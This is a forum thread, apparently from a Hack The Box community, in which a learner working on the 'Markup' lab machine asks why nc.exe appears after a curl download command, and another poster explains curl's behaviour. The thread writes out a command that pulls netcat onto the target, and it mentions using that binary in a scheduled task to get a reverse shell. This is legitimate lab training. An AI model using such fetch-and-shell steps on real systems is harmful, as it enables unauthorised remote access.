Machine: Markup (Starting point) NC.exe has appeared from nowhere how can this be?

Hey forum, clearly I am missing something here. Working through markup and almost rooted it. Next I need to run this:

curl 10.10.10.49/nc.exe -o c:\users\daniel\nc.exe

Before doing so, I check the c:\users\daniel folder to see whats there. There is no nc.exe.

I also searched the filesystem before running the command for nc.exe. Nothing.

Then after running the curl command, nc.exe has appeared in the folder. Where did it come from?

And also on this machine how long does one have to wait for the schedule task to run this?

Not only u do the box, many others dooo, may be another player added tht nc.exe

I have just run the command again and pointed to output to a different folder and sure enough it creates nc.exe in there. I have no doubt that this command is creating nc.exe.

My question is, where is it getting it from?

curl 10.10.10.49/nc.exe -o c:\users\daniel\nc.exe is outputting the result of the cURL command:
-o, --output <file> Write to file instead of stdout

Something isnt making sense here. This is the output of the command:

% Total % Received % Xferd Average Speed Time Time Time Current
100 1056 0 1056 0 0 1056 0 --:–:-- --:–:-- --:–:-- 11234

It appears to have downloaded 1056 bytes from somewhere. But where from? Sure enough I can see an nc.exe file that has been created and its 1056 bytes.

If the nc.exe file is just the output of the curl how can it run? It must be getting the binary for nc.exe from somewhere?

The next step in the walkthrough is to execute this file as part of a scheduled service to receive a reverse shell.

@NeoCortex2000 said:
It appears to have downloaded 1056 bytes from somewhere. But where from? Sure enough I can see an nc.exe file that has been created and its 1056 bytes.

From here (the first parameter you’re passing in to the curl program) :

10.10.10.49/nc.exe

Notice that ends with nc.exe? You’re telling the curl program to download nc.exe from the machine at 10.10.10.49 and output it in C:\Users\Daniel

Now I’ve not looked at this particular machine you’re doing and it does seem weird that the machine already has nc.exe on a web server on it, but perhaps that was part of a previous step where you put it there or something. It would make more sense to me if that IP was the IP of your own machine and you had nc.exe on your own web server, but it looks like the IP of a HTB target machine rather than a client machine.

Thanks for taking the time to look into this… It didn’t seem right to me that I was copying nc.exe into the server from the server that I was on. I couldn’t get it to work so I just SCP’d NC.exe from my local machine and it connected right away.

but good to know that this command would have copied it from my webserver had I been running it and hosting the file.